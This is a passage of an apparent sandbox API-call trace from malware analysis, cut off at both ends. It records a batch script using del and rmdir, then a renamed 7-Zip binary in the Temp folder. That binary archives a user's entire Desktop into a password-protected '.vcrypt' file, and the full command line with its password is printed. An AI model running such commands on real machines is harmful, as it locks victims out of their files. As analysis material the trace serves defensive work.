lpMem=0x566ae0 | out: hHeap=0x550000) returned 1 [0069.578] _wcsicmp (_String1="if", _String2=")") returned 64 [0069.578] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0069.578] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0069.578] _wcsicmp (_String1="IF", _String2="if") returned 0 [0069.578] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0069.578] GetProcessHeap () returned 0x550000 [0069.578] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x563110 [0069.578] GetProcessHeap () returned 0x550000 [0069.578] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe) returned 0x55ffc0 [0069.579] GetProcessHeap () returned 0x550000 [0069.579] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x20) returned 0x5657e0 [0069.580] GetProcessHeap () returned 0x550000 [0069.580] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5657e0, Size=0x16) returned 0x561800 [0069.580] GetProcessHeap () returned 0x550000 [0069.580] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x561800) returned 0x16 [0069.580] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0069.581] GetProcessHeap () returned 0x550000 [0069.581] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x563170 [0069.581] GetProcessHeap () returned 0x550000 [0069.581] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x14) returned 0x5631d0 [0069.581] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0069.581] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0069.582] GetProcessHeap () returned 0x550000 [0069.582] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x12) returned 0x5631f0 [0069.582] GetProcessHeap () returned 0x550000 [0069.582] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1c) returned 0x5657e0 [0069.582] GetProcessHeap () returned 0x550000 [0069.582] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5657e0, Size=0x14) returned 0x563210 [0069.582] GetProcessHeap () returned 0x550000 [0069.582] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x563210) returned 0x14 [0069.582] _wcsicmp (_String1="del", _String2=")") returned 59 [0069.583] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0069.583] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0069.583] _wcsicmp (_String1="IF", _String2="del") returned 5 [0069.583] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0069.583] _wcsicmp (_String1="REM", _String2="del") returned 14 [0069.583] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0069.583] GetProcessHeap () returned 0x550000 [0069.583] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x563230 [0069.583] GetProcessHeap () returned 0x550000 [0069.583] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x10) returned 0x55ffd8 [0069.584] GetProcessHeap () returned 0x550000 [0069.584] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x28) returned 0x563290 [0069.585] GetProcessHeap () returned 0x550000 [0069.585] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x5632c0 [0069.585] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0069.585] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0069.585] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0069.585] GetProcessHeap () returned 0x550000 [0069.585] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x563320 [0069.585] GetProcessHeap () returned 0x550000 [0069.585] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x44) returned 0x563380 [0069.586] GetProcessHeap () returned 0x550000 [0069.586] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x14) returned 0x5633d0 [0069.586] GetProcessHeap () returned 0x550000 [0069.586] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5633d0, Size=0x12) returned 0x5633d0 [0069.586] GetProcessHeap () returned 0x550000 [0069.586] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x5633d0) returned 0x12 [0069.586] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0069.586] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0069.587] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0069.587] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0069.587] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0069.587] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0069.587] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0069.588] GetProcessHeap () returned 0x550000 [0069.588] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x12) returned 0x5633f0 [0069.588] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0069.589] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0069.589] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0069.589] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0069.589] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0069.589] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0069.589] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0069.589] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0069.589] GetProcessHeap () returned 0x550000 [0069.589] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x563410 [0069.589] GetProcessHeap () returned 0x550000 [0069.589] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x14) returned 0x563470 [0069.590] GetProcessHeap () returned 0x550000 [0069.590] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x20) returned 0x5657e0 [0069.592] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0069.594] GetFullPathNameW (in: lpFileName="U:", nBufferLength=0x208, lpBuffer=0x22f578, lpFilePart=0x22f324 | out: lpBuffer="U:\\", lpFilePart=0x22f324*=0x0) returned 0x3 [0069.594] wcsncmp (_String1="U:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -7 [0069.599] GetFileAttributesW (lpFileName="U:\\" (normalized: "u:")) returned 0xffffffff [0069.599] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.599] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0069.604] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.604] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0069.616] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.616] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0069.882] SetConsoleInputExeNameW () returned 0x1 [0069.882] GetConsoleOutputCP () returned 0x1b5 [0069.882] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0069.882] SetThreadUILanguage (LangId=0x0) returned 0x409 [0069.883] exit (_Code=0) Process: id = "66" image_name = "mod_01.exe" filename = "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\mod_01.exe" page_root = "0x4104b000" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x55c" cmd_line = "\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 94 os_tid = 0x7e8 [0070.333] __set_app_type (_Type=0x1) [0070.333] __p__fmode () returned 0x770331f4 [0070.334] __p__commode () returned 0x770331fc [0070.334] __getmainargs (in: _Argc=0x5afbdc, _Argv=0x5afbcc, _Env=0x5afbd8, _DoWildCard=0, _StartInfo=0x5afbd0 | out: _Argc=0x5afbdc, _Argv=0x5afbcc, _Env=0x5afbd8) returned 0 [0070.390] _onexit (_Func=0x341cce) returned 0x341cce [0070.390] _onexit (_Func=0x341e18) returned 0x341e18 [0070.390] _onexit (_Func=0x341e4d) returned 0x341e4d [0070.395] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0070.396] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstStreamW") returned 0x76dbb4f4 [0070.396] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0070.396] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextStreamW") returned 0x76dbb371 [0070.397] _onexit (_Func=0x3723b6) returned 0x3723b6 [0070.397] _onexit (_Func=0x372f9e) returned 0x372f9e [0070.397] _onexit (_Func=0x374948) returned 0x374948 [0070.398] _onexit (_Func=0x37ba98) returned 0x37ba98 [0070.399] _onexit (_Func=0x3b3c40) returned 0x3b3c40 [0070.400] _onexit (_Func=0x3b3cc0) returned 0x3b3cc0 [0070.400] GetVersionExW (in: lpVersionInformation=0x5afa60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x5af9f8, dwMinorVersion=0x77c7019b, dwBuildNumber=0x5afb70, dwPlatformId=0x77cb1ecd, szCSDVersion="ᑇ\x13￾￿矆矆>>") | out: lpVersionInformation=0x5afa60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0070.400] _onexit (_Func=0x3b5460) returned 0x3b5460 [0070.400] __p___initenv () returned 0x770304e8 [0070.400] GetVersionExW (in: lpVersionInformation=0x5afa18*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7ffa3203, dwMinorVersion=0x1fcbfbff, dwBuildNumber=0x1, dwPlatformId=0x66001e, szCSDVersion="\x04") | out: lpVersionInformation=0x5afa18*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0070.400] SetConsoleCtrlHandler (HandlerRoutine=0x3744de, Add=1) returned 1 [0070.401] SetFileApisToOEM () [0070.401] GetCommandLineW () returned="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\" " [0070.401] malloc (_Size=0x1b4) returned 0xb511a0 [0070.401] malloc (_Size=0x1b4) returned 0xb52878 [0070.401] malloc (_Size=0x8) returned 0xb51360 [0070.401] malloc (_Size=0x8) returned 0xb51370 [0070.401] malloc (_Size=0x20) returned 0xb51380 [0070.401] free (_Block=0xb51360) [0070.401] malloc (_Size=0x40) returned 0xb513a8 [0070.401] free (_Block=0xb51380) [0070.401] malloc (_Size=0x60) returned 0xb52a38 [0070.401] free (_Block=0xb513a8) [0070.401] malloc (_Size=0x14e) returned 0xb52aa0 [0070.401] free (_Block=0xb51370) [0070.401] malloc (_Size=0xc) returned 0xb51360 [0070.401] malloc (_Size=0x60) returned 0xb51378 [0070.401] malloc (_Size=0x4) returned 0xb513e0 [0070.401] free (_Block=0x0) [0070.401] free (_Block=0xb52aa0) [0070.402] free (_Block=0xb52a38) [0070.402] malloc (_Size=0x8) returned 0xb513f0 [0070.402] malloc (_Size=0x8) returned 0xb51400 [0070.402] malloc (_Size=0x14c) returned 0xb52a38 [0070.402] free (_Block=0xb51400) [0070.402] free (_Block=0xb52a38) [0070.402] free (_Block=0xb513f0) [0070.402] malloc (_Size=0x8) returned 0xb513f0 [0070.402] malloc (_Size=0x8) returned 0xb51400 [0070.402] malloc (_Size=0x148) returned 0xb52a38 [0070.402] free (_Block=0xb51400) [0070.402] malloc (_Size=0xc) returned 0xb51400 [0070.402] malloc (_Size=0x4) returned 0xb51418 [0070.402] malloc (_Size=0x8) returned 0xb52b88 [0070.402] free (_Block=0xb513e0) [0070.402] free (_Block=0xb52a38) [0070.402] free (_Block=0xb513f0) [0070.402] malloc (_Size=0x8) returned 0xb513e0 [0070.402] malloc (_Size=0x8) returned 0xb513f0 [0070.402] malloc (_Size=0x20) returned 0xb52a38 [0070.402] free (_Block=0xb513e0) [0070.402] malloc (_Size=0x13e) returned 0xb52b98 [0070.402] free (_Block=0xb513f0) [0070.402] malloc (_Size=0xc) returned 0xb513e0 [0070.402] malloc (_Size=0xa) returned 0xb52a60 [0070.402] malloc (_Size=0xc) returned 0xb52a78 [0070.402] free (_Block=0xb52b88) [0070.402] free (_Block=0xb52b98) [0070.402] free (_Block=0xb52a38) [0070.402] malloc (_Size=0x8) returned 0xb52a38 [0070.402] malloc (_Size=0x8) returned 0xb52a48 [0070.402] malloc (_Size=0x138) returned 0xb52a90 [0070.402] free (_Block=0xb52a48) [0070.402] malloc (_Size=0xc) returned 0xb52a48 [0070.402] malloc (_Size=0x6) returned 0xb52bd0 [0070.403] malloc (_Size=0x10) returned 0xb52be0 [0070.403] free (_Block=0xb52a78) [0070.403] free (_Block=0xb52a90) [0070.403] free (_Block=0xb52a38) [0070.403] malloc (_Size=0x8) returned 0xb52a38 [0070.403] malloc (_Size=0x8) returned 0xb52a78 [0070.403] malloc (_Size=0x20) returned 0xb52a88 [0070.403] free (_Block=0xb52a38) [0070.403] malloc (_Size=0x12e) returned 0xb52bf8 [0070.403] free (_Block=0xb52a78) [0070.403] malloc (_Size=0xc) returned 0xb52ab0 [0070.403] malloc (_Size=0xa) returned 0xb52ac8 [0070.403] malloc (_Size=0x18) returned 0xb52ae0 [0070.403] free (_Block=0xb52be0) [0070.403] free (_Block=0xb52bf8) [0070.403] free (_Block=0xb52a88) [0070.403] malloc (_Size=0x8) returned 0xb52a38 [0070.403] malloc (_Size=0x8) returned 0xb52a78 [0070.403] malloc (_Size=0x20) returned 0xb52a88 [0070.403] free (_Block=0xb52a38) [0070.403] malloc (_Size=0x40) returned 0xb52b00 [0070.403] free (_Block=0xb52a88) [0070.403] malloc (_Size=0x60) returned 0xb52b48 [0070.403] free (_Block=0xb52b00) [0070.403] malloc (_Size=0xdc) returned 0xb52be0 [0070.403] free (_Block=0xb52a78) [0070.403] malloc (_Size=0xc) returned 0xb52bb0 [0070.403] malloc (_Size=0x52) returned 0xb52cc8 [0070.403] free (_Block=0xb52be0) [0070.403] free (_Block=0xb52b48) [0070.403] malloc (_Size=0x8) returned 0xb52a38 [0070.403] malloc (_Size=0x8) returned 0xb52a78 [0070.403] malloc (_Size=0x20) returned 0xb52a88 [0070.403] free (_Block=0xb52a38) [0070.403] malloc (_Size=0x40) returned 0xb52b00 [0070.403] free (_Block=0xb52a88) [0070.403] malloc (_Size=0x60) returned 0xb52b48 [0070.404] free (_Block=0xb52b00) [0070.404] malloc (_Size=0xa0) returned 0xb52be0 [0070.404] free (_Block=0xb52b48) [0070.404] malloc (_Size=0x54) returned 0xb52b00 [0070.404] free (_Block=0xb52a78) [0070.404] malloc (_Size=0xc) returned 0xb52a78 [0070.404] malloc (_Size=0x84) returned 0xb52d28 [0070.404] malloc (_Size=0x20) returned 0xb52c88 [0070.404] free (_Block=0xb52ae0) [0070.404] free (_Block=0xb52b00) [0070.404] free (_Block=0xb52be0) [0070.404] malloc (_Size=0x8) returned 0xb52a38 [0070.404] malloc (_Size=0x8) returned 0xb52cb0 [0070.404] malloc (_Size=0x20) returned 0xb52be0 [0070.404] free (_Block=0xb52a38) [0070.404] malloc (_Size=0x40) returned 0xb52c08 [0070.404] free (_Block=0xb52be0) [0070.404] malloc (_Size=0x60) returned 0xb52ae0 [0070.404] free (_Block=0xb52c08) [0070.404] malloc (_Size=0xc) returned 0xb52a90 [0070.404] malloc (_Size=0x50) returned 0xb52b48 [0070.404] free (_Block=0xb52cb0) [0070.404] free (_Block=0xb52ae0) [0070.404] free (_Block=0xb52878) [0070.404] free (_Block=0xb511a0) [0070.404] free (_Block=0xb51378) [0070.404] free (_Block=0xb51360) [0070.404] malloc (_Size=0x8) returned 0xb52ba0 [0070.404] malloc (_Size=0x8) returned 0xb52cb0 [0070.404] malloc (_Size=0x8) returned 0xb52ae0 [0070.404] malloc (_Size=0x8) returned 0xb52af0 [0070.405] malloc (_Size=0x8) returned 0xb52b00 [0070.405] malloc (_Size=0x8) returned 0xb52b10 [0070.405] malloc (_Size=0x8) returned 0xb52b20 [0070.405] malloc (_Size=0x8) returned 0xb52b30 [0070.405] malloc (_Size=0x8) returned 0xb52be0 [0070.405] malloc (_Size=0x8) returned 0xb52bf0 [0070.405] malloc (_Size=0x8) returned 0xb52c00 [0070.405] malloc (_Size=0x8) returned 0xb52c10 [0070.405] malloc (_Size=0x8) returned 0xb52c20 [0070.405] malloc (_Size=0x8) returned 0xb52c30 [0070.406] malloc (_Size=0x8) returned 0xb5d638 [0070.406] malloc (_Size=0x8) returned 0xb5d648 [0070.406] malloc (_Size=0x8) returned 0xb5d658 [0070.406] malloc (_Size=0x4) returned 0xb5d668 [0070.406] malloc (_Size=0x8) returned 0xb5d678 [0070.406] malloc (_Size=0x428) returned 0xb5de20 [0070.406] malloc (_Size=0xc) returned 0xb52c40 [0070.406] malloc (_Size=0x4) returned 0xb5d688 [0070.406] malloc (_Size=0x4) returned 0xb5d698 [0070.406] free (_Block=0x0) [0070.406] malloc (_Size=0x6) returned 0xb5d6a8 [0070.406] malloc (_Size=0xc) returned 0xb52c58 [0070.406] malloc (_Size=0x6) returned 0xb5d6b8 [0070.406] malloc (_Size=0x4) returned 0xb5d6c8 [0070.406] free (_Block=0x0) [0070.406] free (_Block=0xb5d6a8) [0070.406] malloc (_Size=0x6) returned 0xb5d6a8 [0070.406] malloc (_Size=0xc) returned 0xb52c70 [0070.406] malloc (_Size=0x6) returned 0xb5d6d8 [0070.406] malloc (_Size=0x4) returned 0xb5d6e8 [0070.406] free (_Block=0x0) [0070.406] free (_Block=0xb5d6a8) [0070.406] malloc (_Size=0x4e) returned 0xb52878 [0070.406] malloc (_Size=0xc) returned 0xb528d0 [0070.406] malloc (_Size=0x4e) returned 0xb528e8 [0070.406] malloc (_Size=0x4) returned 0xb5d6a8 [0070.406] free (_Block=0x0) [0070.406] free (_Block=0xb52878) [0070.406] malloc (_Size=0xc) returned 0xb52878 [0070.406] malloc (_Size=0x84) returned 0xb52940 [0070.407] malloc (_Size=0x8) returned 0xb5d6f8 [0070.407] free (_Block=0xb5d698) [0070.407] malloc (_Size=0xc) returned 0xb52890 [0070.407] malloc (_Size=0x50) returned 0xb529d0 [0070.407] malloc (_Size=0xc) returned 0xb52a28 [0070.407] free (_Block=0xb5d6f8) [0070.407] _fileno (_File=0x77032900) returned 0 [0070.407] _isatty (_FileHandle=0) returned 64 [0070.407] _fileno (_File=0x77032920) returned 1 [0070.407] _isatty (_FileHandle=1) returned 64 [0070.407] _fileno (_File=0x77032940) returned 2 [0070.407] _isatty (_FileHandle=2) returned 64 [0070.407] GetCurrentProcess () returned 0xffffffff [0070.407] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x5af520 | out: TokenHandle=0x5af520*=0x80) returned 1 [0070.407] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeRestorePrivilege", lpLuid=0x5af514 | out: lpLuid=0x5af514*(LowPart=0x12, HighPart=0)) returned 1 [0070.509] AdjustTokenPrivileges (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x5af510*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0070.509] GetLastError () returned 0x0 [0070.510] CloseHandle (hObject=0x80) returned 1 [0070.510] GetCurrentProcess () returned 0xffffffff [0070.510] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x5af524 | out: TokenHandle=0x5af524*=0x80) returned 1 [0070.510] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeCreateSymbolicLinkPrivilege", lpLuid=0x5af518 | out: lpLuid=0x5af518*(LowPart=0x23, HighPart=0)) returned 1 [0070.511] AdjustTokenPrivileges (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x5af514*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0070.511] GetLastError () returned 0x0 [0070.511] CloseHandle (hObject=0x80) returned 1 [0070.511] fputs (in: _Str="\n7-Zip (a) 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30\n\n", _File=0x77032920 | out: _File=0x77032920) returned 0 [0070.514] malloc (_Size=0x4) returned 0xb5d6f8 [0070.514] free (_Block=0xb5d6f8) [0070.514] malloc (_Size=0x84) returned 0xb511a0 [0070.514] free (_Block=0xb52ba0) [0070.514] malloc (_Size=0x10) returned 0xb528a8 [0070.515] malloc (_Size=0x8) returned 0xb5d6f8 [0070.515] malloc (_Size=0x4) returned 0xb5d698 [0070.515] free (_Block=0x0) [0070.515] malloc (_Size=0x50) returned 0xb51230 [0070.515] free (_Block=0xb5d6f8) [0070.515] malloc (_Size=0x4e) returned 0xb51288 [0070.515] free (_Block=0xb52cb0) [0070.515] malloc (_Size=0x8) returned 0xb5d6f8 [0070.515] malloc (_Size=0x8) returned 0xb5d708 [0070.515] malloc (_Size=0x18) returned 0xb512e0 [0070.515] malloc (_Size=0x6) returned 0xb5d718 [0070.515] malloc (_Size=0x2) returned 0xb5d728 [0070.515] malloc (_Size=0x4) returned 0xb5d738 [0070.515] free (_Block=0x0) [0070.515] free (_Block=0xb5d708) [0070.515] free (_Block=0xb5d6f8) [0070.515] malloc (_Size=0x8) returned 0xb5d6f8 [0070.515] malloc (_Size=0x8) returned 0xb5d708 [0070.515] malloc (_Size=0x8) returned 0xb5d748 [0070.515] malloc (_Size=0x8) returned 0xb5d758 [0070.515] malloc (_Size=0x8) returned 0xb5d768 [0070.515] malloc (_Size=0x8) returned 0xb5d778 [0070.515] malloc (_Size=0x8) returned 0xb5d788 [0070.516] malloc (_Size=0x8) returned 0xb5d798 [0070.516] malloc (_Size=0x80) returned 0xb51300 [0070.516] malloc (_Size=0x2) returned 0xb5d7a8 [0070.516] malloc (_Size=0x2) returned 0xb5d7b8 [0070.516] malloc (_Size=0x2) returned 0xb5d7c8 [0070.516] malloc (_Size=0x2) returned 0xb5d7d8 [0070.516] malloc (_Size=0x2) returned 0xb5d7e8 [0070.516] malloc (_Size=0x2) returned 0xb5d7f8 [0070.516] malloc (_Size=0x2) returned 0xb5d808 [0070.516] malloc (_Size=0x2) returned 0xb5d818 [0070.516] malloc (_Size=0x4) returned 0xb5d828 [0070.516] free (_Block=0x0) [0070.516] free (_Block=0xb5d798) [0070.516] free (_Block=0xb5d788) [0070.516] free (_Block=0xb5d778) [0070.516] free (_Block=0xb5d768) [0070.516] free (_Block=0xb5d758) [0070.516] free (_Block=0xb5d748) [0070.516] free (_Block=0xb5d708) [0070.516] free (_Block=0xb5d6f8) [0070.516] malloc (_Size=0x4) returned 0xb5d6f8 [0070.516] free (_Block=0x0) [0070.516] malloc (_Size=0x18) returned 0xb51388 [0070.517] malloc (_Size=0x6) returned 0xb5d708 [0070.517] malloc (_Size=0x2) returned 0xb5d748 [0070.517] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0070.517] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x5afab4 | out: lpConsoleScreenBufferInfo=0x5afab4) returned 1 [0070.517] malloc (_Size=0x18) returned 0xb513a8 [0070.518] malloc (_Size=0x8) returned 0xb5d758 [0070.518] malloc (_Size=0xc) returned 0xb513c8 [0070.518] free (_Block=0xb5d758) [0070.518] malloc (_Size=0x8) returned 0xb5d758 [0070.518] malloc (_Size=0x8) returned 0xb5d768 [0070.518] malloc (_Size=0x26) returned 0xb5f258 [0070.518] free (_Block=0xb5d758) [0070.518] malloc (_Size=0x1c) returned 0xb5f288 [0070.518] free (_Block=0xb5d768) [0070.518] malloc (_Size=0x8) returned 0xb5d768 [0070.518] malloc (_Size=0xc) returned 0xb52cb0 [0070.518] malloc (_Size=0x8) returned 0xb5d758 [0070.518] malloc (_Size=0x4) returned 0xb5d778 [0070.518] free (_Block=0x0) [0070.518] malloc (_Size=0x20) returned 0xb5f2b0 [0070.518] free (_Block=0xb5d768) [0070.518] malloc (_Size=0xc) returned 0xb5f2d8 [0070.518] malloc (_Size=0xc) returned 0xb5f308 [0070.518] malloc (_Size=0x8) returned 0xb5d768 [0070.518] free (_Block=0xb5d778) [0070.518] malloc (_Size=0xc) returned 0xb5f320 [0070.518] malloc (_Size=0xa) returned 0xb5f338 [0070.518] malloc (_Size=0xc) returned 0xb5f350 [0070.518] free (_Block=0xb5d768) [0070.518] malloc (_Size=0xc) returned 0xb5f368 [0070.519] malloc (_Size=0x8) returned 0xb5d768 [0070.519] malloc (_Size=0x10) returned 0xb5f380 [0070.519] free (_Block=0xb5f350) [0070.519] free (_Block=0xb5f2b0) [0070.519] malloc (_Size=0x8) returned 0xb5d778 [0070.519] malloc (_Size=0xc) returned 0xb5f350 [0070.519] malloc (_Size=0x4) returned 0xb5d788 [0070.519] malloc (_Size=0x4) returned 0xb5d798 [0070.519] free (_Block=0x0) [0070.519] malloc (_Size=0xc) returned 0xb5f398 [0070.519] malloc (_Size=0x4) returned 0xb5d838 [0070.519] malloc (_Size=0x8) returned 0xb5d848 [0070.519] free (_Block=0xb5d798) [0070.519] malloc (_Size=0x20) returned 0xb5f2b0 [0070.519] free (_Block=0xb5d778) [0070.519] malloc (_Size=0xc) returned 0xb5f3b0 [0070.519] malloc (_Size=0xa) returned 0xb5f3c8 [0070.519] malloc (_Size=0xc) returned 0xb5f3e0 [0070.519] free (_Block=0xb5d848) [0070.519] malloc (_Size=0xc) returned 0xb5f3f8 [0070.519] malloc (_Size=0xa) returned 0xb5f410 [0070.519] malloc (_Size=0x10) returned 0xb5f428 [0070.519] free (_Block=0xb5f3e0) [0070.519] free (_Block=0xb5f2b0) [0070.519] malloc (_Size=0x8) returned 0xb5d848 [0070.519] malloc (_Size=0x8) returned 0xb5d778 [0070.520] wcscmp (_String1="*", _String2="*") returned 0 [0070.520] malloc (_Size=0x18) returned 0xb5f2b0 [0070.520] malloc (_Size=0x8) returned 0xb5d798 [0070.520] malloc (_Size=0x2) returned 0xb5d858 [0070.520] malloc (_Size=0x4) returned 0xb5d868 [0070.520] free (_Block=0x0) [0070.520] free (_Block=0xb5d778) [0070.520] free (_Block=0xb5d848) [0070.520] malloc (_Size=0x8) returned 0xb5d848 [0070.520] malloc (_Size=0x8) returned 0xb5d778 [0070.520] malloc (_Size=0xc) returned 0xb5f3e0 [0070.520] free (_Block=0xb5d848) [0070.520] wcscmp (_String1="*", _String2="*") returned 0 [0070.520] malloc (_Size=0x18) returned 0xb5f6f0 [0070.520] malloc (_Size=0xc) returned 0xb5f440 [0070.520] malloc (_Size=0x2) returned 0xb5d848 [0070.520] malloc (_Size=0x8) returned 0xb5d878 [0070.520] free (_Block=0xb5d868) [0070.520] free (_Block=0xb5d778) [0070.520] free (_Block=0xb5f3e0) [0070.520] malloc (_Size=0x8) returned 0xb5d778 [0070.520] malloc (_Size=0x8) returned 0xb5d868 [0070.520] malloc (_Size=0xa) returned 0xb5f3e0 [0070.520] free (_Block=0xb5d778) [0070.520] malloc (_Size=0xa) returned 0xb5f458 [0070.520] free (_Block=0xb5d868) [0070.520] wcscmp (_String1=".tar", _String2="*") returned 1 [0070.520] malloc (_Size=0x18) returned 0xb5f710 [0070.520] malloc (_Size=0xa) returned 0xb5f470 [0070.521] malloc (_Size=0xa) returned 0xb5f488 [0070.521] malloc (_Size=0xc) returned 0xb5f4a0 [0070.521] free (_Block=0xb5d878) [0070.521] free (_Block=0xb5f458) [0070.521] free (_Block=0xb5f3e0) [0070.521] malloc (_Size=0x8) returned 0xb5d878 [0070.521] malloc (_Size=0x8) returned 0xb5d868 [0070.521] malloc (_Size=0xa) returned 0xb5f3e0 [0070.521] free (_Block=0xb5d868) [0070.521] wcscmp (_String1=".tar", _String2="*") returned 1 [0070.521] malloc (_Size=0x18) returned 0xb5f730 [0070.521] malloc (_Size=0x8) returned 0xb5d868 [0070.521] malloc (_Size=0xa) returned 0xb5f458 [0070.521] malloc (_Size=0x10) returned 0xb5f4b8 [0070.521] free 